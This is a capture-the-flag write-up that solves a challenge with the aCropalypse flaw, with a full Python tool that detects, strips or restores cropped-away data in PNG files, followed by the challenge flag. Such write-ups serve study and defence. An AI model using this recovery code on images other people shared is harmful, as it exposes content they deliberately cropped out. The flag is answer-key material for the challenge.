Misc - a little bit of tomcroppery

117 points | 313 solves

Description

Once you crop an image, the cropped part is gone... right???

Downloads

Solution

I could immediately tell that this is the well-known "aCropalypse" vulnerability. What I didn't expect was for a working script to recover the cropped image to be so difficult to find, so I thought I should document this.

Firstly, one could go to this website to check if an image is vulnerable.

Secondly, use the code below to recover the image.

import zlib
import sys
import io
from PIL import Image
from math import ceil
import numpy as np
import argparse
import struct


def parse_args():
    """Build the command-line interface and parse ``sys.argv``.

    Three sub-commands are registered: ``detect`` (one positional argument),
    ``delete`` (input and output paths) and ``restore`` (exploit type, input
    path and output path).

    Returns:
        A ``(args, parser)`` tuple: the parsed namespace and the parser
        object itself, so the caller can print the usage text.
    """
    cli = argparse.ArgumentParser(description="A tool for restoring hidden data in PNG files.")
    commands = cli.add_subparsers(dest='command')

    # detect <cropped>
    detect_cmd = commands.add_parser('detect', help="Detect and display the trailing bytes length.")
    detect_cmd.add_argument('cropped', help="The input cropped PNG file.")

    # delete <cropped> <output>
    delete_cmd = commands.add_parser('delete', help="Delete the hidden data.")
    delete_cmd.add_argument('cropped', help="The input cropped PNG file.")
    delete_cmd.add_argument('output', help="The output PNG file without trailing data.")

    # restore <pixel|windows> <cropped> <reconstructed>
    restore_cmd = commands.add_parser('restore', help="Restore the hidden data and create a new PNG image.")
    restore_cmd.add_argument('type_exploit', choices=['pixel', 'windows'], help="Type of exploit: 'pixel' or 'windows'.")
    restore_cmd.add_argument('cropped', help="The input cropped PNG file.")
    restore_cmd.add_argument('reconstructed', help="The output reconstructed PNG file.")

    return cli.parse_args(), cli
    
    
    
# 8-byte signature expected at the very start of a PNG file.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Chunk type tag that marks the end of the PNG chunk sequence.
IEND_CHUNK = b'IEND'

# Function to read a PNG chunk
def read_chunk(file):
    """Read one PNG chunk from a binary stream without validating it.

    Args:
        file: Binary file-like object positioned at the start of a chunk
            (i.e. at its 4-byte big-endian length field).

    Returns:
        A ``(chunk_type, data, crc)`` tuple of raw bytes, or ``None`` when
        fewer than four bytes remain for the length field (clean end of
        stream or a truncated tail). The CRC is returned as read; it is not
        checked against the data.
    """
    length_bytes = file.read(4)
    # A short read (0-3 bytes) cannot be unpacked as a length; treat it as
    # the end of the stream instead of letting struct.unpack raise.
    if len(length_bytes) < 4:
        return None
    (length,) = struct.unpack('!I', length_bytes)
    chunk_type = file.read(4)
    data = file.read(length)
    crc = file.read(4)
    return (chunk_type, data, crc)

# Function to remove data after IEND chunk
def remove_data_after_iend(input_file, output_file):
    """Copy a PNG up to and including its IEND chunk, dropping what follows.

    The input signature is validated *before* the output file is opened, so
    a non-PNG input no longer creates or truncates ``output_file``.

    Chunks are copied as read: the CRC is written back unchanged (it is not
    verified) and the length field is rebuilt from the data actually read.

    Args:
        input_file: Path of the PNG file to read.
        output_file: Path of the PNG file to write.

    Returns:
        None. A message is printed when the input lacks the PNG signature.
    """
    with open(input_file, 'rb') as f_in:
        signature = f_in.read(len(PNG_MAGIC))
        if signature != PNG_MAGIC:
            print("The file is not a valid PNG file.")
            return

        with open(output_file, 'wb') as f_out:
            f_out.write(signature)
            while True:
                chunk = read_chunk(f_in)
                if not chunk:
                    # Input ended before an IEND chunk was seen.
                    break

                chunk_type, data, crc = chunk
                f_out.write(struct.pack('!I', len(data)))
                f_out.write(chunk_type)
                f_out.write(data)
                f_out.write(crc)

                # Everything after IEND is deliberately not copied.
                if chunk_type == IEND_CHUNK:
                    break

# Function to parse PNG chunks
def parse_png_chunk(stream):
    """Read one PNG chunk from *stream* and verify its CRC-32.

    Args:
        stream: Binary file-like object positioned at a chunk's 4-byte
            big-endian length field.

    Returns:
        A ``(ctype, body)`` tuple: the 4-byte chunk type and the chunk data.

    Raises:
        ValueError: If the stream ends before a complete chunk was read, or
            if the stored CRC does not match ``crc32(ctype + body)``.
    """
    size_bytes = stream.read(4)
    ctype = stream.read(4)
    # At end of stream every read returns b"", which would otherwise parse as
    # a zero-length chunk whose CRC (0) happens to match crc32(b"") and let
    # callers loop forever waiting for IEND.
    if len(size_bytes) != 4 or len(ctype) != 4:
        raise ValueError("Unexpected end of data while reading a PNG chunk header")

    size = int.from_bytes(size_bytes, "big")
    body = stream.read(size)
    csum_bytes = stream.read(4)
    if len(body) != size or len(csum_bytes) != 4:
        raise ValueError("Unexpected end of data inside PNG chunk {!r}".format(ctype))

    # Explicit raise instead of assert so the check survives `python -O`.
    if zlib.crc32(ctype + body) != int.from_bytes(csum_bytes, "big"):
        raise ValueError("CRC mismatch in PNG chunk {!r}".format(ctype))
    return ctype, body

# Function to pack PNG chunks
def pack_png_chunk(stream, name, body):
    """Serialize one PNG chunk to *stream*.

    Writes, in order: the 4-byte big-endian length of *body*, the chunk
    type *name*, *body* itself, and the 4-byte big-endian CRC-32 computed
    over *name* followed by *body*.

    Args:
        stream: Writable binary file-like object.
        name: Chunk type bytes (e.g. ``b"IDAT"``).
        body: Chunk payload bytes.
    """
    emit = stream.write
    emit(len(body).to_bytes(4, "big"))
    emit(name)
    emit(body)
    # Running CRC: seed with the type tag, then continue over the payload.
    checksum = zlib.crc32(name)
    checksum = zlib.crc32(body, checksum)
    emit(checksum.to_bytes(4, "big"))

# Function to process trailing bytes
def trailing_bytes(input_file):
    """Locate leftover data after the first IEND chunk of a PNG file.

    The file is parsed chunk by chunk until IEND; everything after it is the
    "trailer". The trailer is then searched for an ``IDAT`` tag starting at
    offset 12.

    Args:
        input_file: Path of the PNG file to inspect.

    Returns:
        A ``(idat, stream)`` tuple: ``idat`` is the trailer slice from byte
        12 up to 8 bytes before the located ``IDAT`` tag, and ``stream`` is
        a ``BytesIO`` over the trailer starting 4 bytes before that tag
        (where ``parse_png_chunk`` expects the chunk length field).

    Exits the process via ``sys.exit()`` when no ``IDAT`` tag is found.
    """
    with open(input_file, "rb") as png:
        header = png.read(len(PNG_MAGIC))
        assert(header == PNG_MAGIC)

        # Consume the regular chunk sequence up to and including IEND.
        chunk_type = None
        while chunk_type != b"IEND":
            chunk_type, _ = parse_png_chunk(png)

        trailer = png.read()
    print(f"Found {len(trailer)} trailing bytes!")

    # NOTE(review): the offsets 12 and -8 presumably skip chunk framing
    # (length/type/CRC fields) around the partial data - confirm.
    tag_pos = trailer.find(b"IDAT", 12)
    if tag_pos == -1:
        print("No trailing IDATs found :(")
        sys.exit()

    idat = trailer[12:tag_pos - 8]
    remaining_chunks = io.BytesIO(trailer[tag_pos - 4:])
    return idat, remaining_chunks

# Function to extract IDAT chunk
def extract_idat(idat, stream):
    """Append the payload of every following IDAT chunk to *idat*.

    Chunks are read from *stream* until an IEND chunk is reached. The final
    four bytes of the accumulated data are then removed.

    Args:
        idat: Bytes collected so far.
        stream: Binary stream positioned at the next chunk.

    Returns:
        The accumulated IDAT bytes without their last four bytes.

    Raises:
        Exception: If a chunk other than IDAT or IEND is encountered.
    """
    chunk_type, payload = parse_png_chunk(stream)
    while chunk_type != b"IEND":
        if chunk_type != b"IDAT":
            raise Exception("Unexpected chunk type: " + repr(chunk_type))
        idat += payload
        chunk_type, payload = parse_png_chunk(stream)

    # NOTE(review): presumably strips the 4-byte zlib Adler-32 trailer - confirm.
    idat = idat[:-4]

    print(f"Extracted {len(idat)} bytes of idat!")
    return idat

# Function to build a bitstream from IDAT chunk
def build_bitstream(idat):
    """Expand *idat* into a flat list of bits, least-significant bit first.

    Seven zero bits are appended after the data so that an 8-bit window can
    start at any of the last byte's bit positions.

    Args:
        idat: Bytes-like object to expand.

    Returns:
        A list of ``0``/``1`` integers of length ``8 * len(idat) + 7``.
    """
    print("Building bitstream...")
    bits = [(value >> shift) & 1 for value in idat for shift in range(8)]
    bits.extend([0] * 7)
    return bits

# Function to reconstruct bit-shifted bytestreams
def bitshifted(bitstream, idat=None):
    """Build the eight bit-shifted byte views of *bitstream*.

    View ``i`` re-packs the bitstream into bytes starting at bit ``i``
    (least-significant bit first), so a deflate block that begins at any bit
    offset is byte-aligned in exactly one of the views.

    Args:
        bitstream: Sequence of ``0``/``1`` integers, LSB-first per byte, as
            produced by ``build_bitstream`` (data bits plus 7 padding bits).
        idat: Optional original bytes used for the sanity checks. When
            omitted, the reference bytes are re-derived from *bitstream*
            itself, so the function no longer depends on a module-level
            ``idat`` variable being defined by the caller's script.

    Returns:
        A list of eight ``bytes`` objects, one per bit offset ``0..7``.

    Raises:
        AssertionError: If view 0 does not reproduce the reference bytes, or
            view 1 is identical to them (the shift had no effect).
    """
    print("Reconstructing bit-shifted bytestreams...")
    byte_offsets = []
    bitstream_np = np.array(bitstream)
    bit_indices = np.arange(8)  # loop-invariant: bit positions within a byte

    for i in range(8):
        # Start index of every 8-bit window for this shift; the "-7" keeps
        # each window inside the (padded) bitstream.
        indices = np.arange(i, len(bitstream) - 7, 8).reshape(-1, 1)
        shifted_bits = bitstream_np[indices + bit_indices] << bit_indices
        shifted_bytestream = np.sum(shifted_bits, axis=1).astype(np.uint8)
        byte_offsets.append(shifted_bytestream.tobytes())

    if idat is None:
        # Pack the unshifted data bits back into bytes as the reference.
        whole_bytes = len(byte_offsets[0])
        reference_bits = bitstream_np[:8 * whole_bytes].astype(np.uint8)
        idat = np.packbits(reference_bits, bitorder="little").tobytes()

    assert(byte_offsets[0] == idat)
    assert(byte_offsets[1] != idat)
    return byte_offsets

# Function to find viable parses
def parses(idat, byte_offsets):
    """Scan bit offsets for one where the data inflates to a clean end.

    For each bit offset ``i`` in ``range(len(idat))`` the matching
    byte-aligned view is taken from *byte_offsets*. Only candidates whose
    first three bits equal ``0b100`` are tried. Each candidate is inflated
    as a raw deflate stream behind a synthetic stored block of 0x8000 ``X``
    bytes; that filler is stripped from the result.

    Args:
        idat: Original data bytes; only its length is used here.
        byte_offsets: The eight bit-shifted views of the data.

    Returns:
        The inflated bytes (without the 0x8000-byte filler) of the first
        candidate that reaches end-of-stream with at most a single zero
        byte left over.

    Exits the process via ``sys.exit()`` when no candidate qualifies.
    """
    print("Scanning for viable parses...")

    # Stored (uncompressed) deflate block header: LEN = 0x8000 and its
    # one's complement, followed by LEN filler bytes.
    window = 0x8000
    stored_header = b"\x00" + window.to_bytes(2, "little") + (window ^ 0xffff).to_bytes(2, "little")
    prefix = stored_header + b"X" * window

    for bit_offset in range(len(idat)):
        skip, shift = divmod(bit_offset, 8)
        candidate = byte_offsets[shift][skip:]

        if candidate[0] & 7 == 0b100:
            inflater = zlib.decompressobj(wbits=-15)
            try:
                # NOTE(review): Decompress.flush() takes an output-buffer
                # length, not a flush mode; the constant is kept as-is.
                decompressed = inflater.decompress(prefix + candidate) + inflater.flush(zlib.Z_FINISH)
                decompressed = decompressed[0x8000:]

                leftover = inflater.unused_data
                if inflater.eof and leftover in [b"", b"\x00"]:
                    print(f"Found viable parse at bit offset {bit_offset}!")
                    break
                print(f"Parsed until the end of a zlib stream, but there was still {len(leftover)} byte of remaining data. Skipping.")
            except zlib.error:
                # Not a valid deflate stream at this offset; keep scanning.
                pass
    else:
        print("Failed to find viable parse :(")
        sys.exit()

    print(f"decompressed length = {len(decompressed)}")
    return decompressed

def parsesv2(idat, byte_offsets):
    """Scan bit offsets for one where the data inflates to a clean end.

    For each bit offset ``i`` in ``range(len(idat))`` the matching
    byte-aligned view ``byte_offsets[i % 8][i // 8:]`` is considered. Only
    candidates whose first three bits equal ``0b100`` are tried. Each one is
    inflated as a raw deflate stream behind a synthetic stored block of
    0x8000 ``X`` bytes, which is stripped from the result.

    Args:
        idat: Original data bytes; only its length is used here.
        byte_offsets: The eight bit-shifted views of the data.

    Returns:
        The inflated bytes (without the 0x8000-byte filler) of the first
        candidate that reaches end-of-stream with no leftover input, or with
        a single zero byte left over.

    Exits the process via ``sys.exit()`` when no candidate qualifies.
    """
    print("Scanning for viable parses...")

    # Stored (uncompressed) deflate block: LEN = 0x8000, its one's
    # complement, then LEN filler bytes.
    prefix = b"\x00" + (0x8000).to_bytes(2, "little") + (0x8000 ^ 0xffff).to_bytes(2, "little") + b"X" * 0x8000

    for i in range(len(idat)):
        truncated = byte_offsets[i % 8][i // 8:]

        if truncated[0] & 7 != 0b100:
            continue

        d = zlib.decompressobj(wbits=-15)
        try:
            # Decompress.flush() takes an optional buffer length, not a
            # flush mode, so it is called without arguments.
            decompressed = d.decompress(prefix + truncated) + d.flush()
        except zlib.error:
            # Not a valid deflate stream at this offset; keep scanning.
            continue
        decompressed = decompressed[0x8000:]

        # Accept at most one trailing zero byte (padding left by the shift).
        if d.eof and d.unused_data in (b"", b"\x00"):
            print(f"Found viable parse at bit offset {i}!")
            break
        print(f"Parsed until the end of a zlib stream, but there were still {len(d.unused_data)} bytes of remaining data. Skipping.")
    else:
        print("Failed to find viable parse :(")
        # sys.exit() rather than the site-provided exit(), which is missing
        # under `python -S` and in frozen builds.
        sys.exit()

    print("len(decompressed) = {}".format(len(decompressed)))
    return decompressed
    
# Function to create an image from decompressed data
def create_image(height, width, type_exploit, decompressed):
    """Build the IHDR payload and compressed pixel data for the output PNG.

    A ``height`` x ``width`` buffer of placeholder pixels (one leading
    filter byte of 0 per row) is created and its tail is overwritten with
    *decompressed*.

    Args:
        height: Image height in pixels.
        width: Image width in pixels.
        type_exploit: ``"pixel"`` selects 3 bytes per pixel and colour type
            2; any other value (``"windows"``) selects 4 bytes per pixel and
            colour type 6.
        decompressed: Recovered raw scanline bytes placed at the end of the
            buffer. May be empty.

    Returns:
        A ``(compressed_idat, ihdr)`` tuple: the zlib-compressed pixel
        buffer and the 13-byte IHDR chunk payload.
    """
    is_rgb = type_exploit == "pixel"
    channels = 3 if is_rgb else 4

    # width, height, bit depth 8, colour type, then compression method,
    # filter method and interlace method (all 0).
    ihdr = (
        width.to_bytes(4, "big")
        + height.to_bytes(4, "big")
        + bytes([8, 2 if is_rgb else 6, 0, 0, 0])
    )

    # Placeholder pixel shown wherever no recovered data is available.
    filler = b"\xff\x00\xff" if is_rgb else b"\xff\x00\xff\xff"
    reconstructed_idat = bytearray((b"\x00" + filler * width) * height)

    # Guard the empty case: buf[-0:] is buf[0:], which would replace the
    # whole placeholder buffer with nothing.
    if decompressed:
        reconstructed_idat[-len(decompressed):] = decompressed

    # A row's filter byte equal to "X" is reset to 0 (filter type "None").
    # NOTE(review): "X" presumably comes from the filler window used while
    # inflating the recovered stream - confirm.
    for i in range(0, len(reconstructed_idat), width * channels + 1):
        if reconstructed_idat[i] == ord("X"):
            reconstructed_idat[i] = 0

    return zlib.compress(reconstructed_idat), ihdr


# Function to generate output PNG file
def generate_png(height, width, type_exploit, decompressed, output_path=None):
    """Write a reconstructed PNG to disk and open it with Pillow.

    The file consists of the PNG signature followed by one IHDR, one IDAT
    and one IEND chunk.

    Args:
        height: Image height in pixels.
        width: Image width in pixels.
        type_exploit: Exploit type forwarded to ``create_image``.
        decompressed: Recovered raw scanline bytes.
        output_path: Destination file. Defaults to ``sys.argv[4]`` (the
            path this function previously always used), so existing callers
            are unaffected.

    Returns:
        The ``PIL.Image`` object returned by ``Image.open`` for the file.
    """
    if output_path is None:
        output_path = sys.argv[4]

    # Build the payloads first so a failure here does not leave a
    # half-written output file behind.
    idat_compressed, ihdr = create_image(height, width, type_exploit, decompressed)

    # The context manager closes the file; no explicit close() is needed.
    with open(output_path, "wb") as out:
        out.write(PNG_MAGIC)
        pack_png_chunk(out, b"IHDR", ihdr)
        pack_png_chunk(out, b"IDAT", idat_compressed)
        pack_png_chunk(out, b"IEND", b"")
    return Image.open(output_path)

# Function to find final image dimensions
def find_final_width(height, width, type_exploit, decompressed):
    """Search for an image width at which the reconstructed PNG loads.

    Phase 1 starts at *width* and increases it by one until the generated
    PNG loads without raising. Phase 2 tries that width and the next four,
    each with the height computed by ``find_final_height``, and keeps the
    last one that loads.

    Args:
        height: Height used for every attempt in phase 1.
        width: First width to try.
        type_exploit: Exploit type forwarded to the helpers.
        decompressed: Recovered raw scanline bytes.

    Returns:
        The selected width in pixels.
    """
    print("Generating output PNG...")
    valid_width = width

    while True:
        try:
            generate_png(height, valid_width, type_exploit, decompressed).load()
            break
        # `except Exception` (not a bare except) so Ctrl-C and SystemExit
        # can still stop this otherwise unbounded scan.
        except Exception:
            valid_width += 1
            if valid_width % 10 == 0:
                print("Width > {} pixels".format(valid_width))

    # range() is evaluated once, so updating valid_width below does not
    # extend the five-candidate window.
    for candidate in range(valid_width, valid_width + 5):
        try:
            candidate_height = find_final_height(candidate, type_exploit, decompressed)
            generate_png(candidate_height, candidate, type_exploit, decompressed).load()
        except Exception:
            continue
        valid_width = candidate

    return valid_width
    
    
def find_final_height(wid, type_exploit, decompressed):
    """Return the smallest height whose rows can hold *decompressed*.

    Each row takes ``wid * bytes_per_pixel + 1`` bytes (one extra byte per
    row), with 4 bytes per pixel for ``"windows"`` and 3 for ``"pixel"``.

    Args:
        wid: Image width in pixels.
        type_exploit: ``"windows"`` or ``"pixel"``.
        decompressed: Recovered data; only its length is used.

    Returns:
        ``ceil(len(decompressed) / row_size)``, or ``None`` for any other
        *type_exploit*.
    """
    bytes_per_pixel = {"windows": 4, "pixel": 3}.get(type_exploit)
    if bytes_per_pixel is None:
        return None
    row_size = wid * bytes_per_pixel + 1
    return ceil(len(decompressed) / row_size)
# Main function: script entry point. Dispatches on the sub-command given in
# sys.argv[1] ("detect", "delete" or "restore").
# NOTE: every name assigned in this block (idat, decompressed, width, ...) is
# a module-level global, and arguments are read positionally from sys.argv.
if __name__ == '__main__':
    # Let argparse validate the command line first; the parser is kept so the
    # usage text can be printed below.
    args, parser = parse_args()

    if len(sys.argv) < 2:
        parser.print_help()
        sys.exit()

    option = sys.argv[1]

    if option == "detect":
        # trailing_bytes() prints the trailer size and exits by itself when
        # no trailing IDAT is found, so reaching the next line means data
        # was found.
        _, _ = trailing_bytes(sys.argv[2])
        print("The image is vulnerable")
        sys.exit()

    elif option == "delete":
        if len(sys.argv) != 4:
            parser.print_help()
            sys.exit()
        else:
            # sys.argv[2] is the input PNG, sys.argv[3] the cleaned output.
            remove_data_after_iend(sys.argv[2], sys.argv[3])
            print("Data after IEND marker has been removed and the new file has been saved as '{}'".format(sys.argv[3]))
            sys.exit()

    elif option == "restore":
        if len(sys.argv) != 5 or sys.argv[2] not in ["pixel", "windows"]:
            parser.print_help()
            sys.exit()
        else:
            # sys.argv[2] = exploit type, sys.argv[3] = cropped input,
            # sys.argv[4] = reconstructed output (generate_png writes there
            # by default).
            type_exploit = sys.argv[2]
            cropped_img = Image.open(sys.argv[3])

            # Recovery pipeline: trailer -> IDAT bytes -> bitstream ->
            # bit-shifted views -> inflated pixel data.
            idat, stream = trailing_bytes(sys.argv[3])
            idat = extract_idat(idat, stream)
            bitstream = build_bitstream(idat)
            bitshifted_bytestream = bitshifted(bitstream)
            decompressed = parsesv2(idat, bitshifted_bytestream)

            # Initial guesses: the cropped image's width, and a height of
            # sqrt(number of recovered bytes) rounded up.
            width, _ = cropped_img.size
            height = ceil(len(decompressed) ** 0.5)

            valid_width = find_final_width(height, width, type_exploit, decompressed)
            valid_height = find_final_height(valid_width, type_exploit, decompressed)
            print("Dimensions found = {}x{}".format(valid_width, valid_height))
            # Write the final image once more with the chosen size and show it.
            generate_png(valid_height, valid_width, type_exploit, decompressed).show()
            sys.exit()

    else:
        parser.print_help()
        sys.exit()

Image being recovered

Flag: LITCTF{4cr0p41yp5e_15_k1nd_0f_c001_j9g0s}

Last updated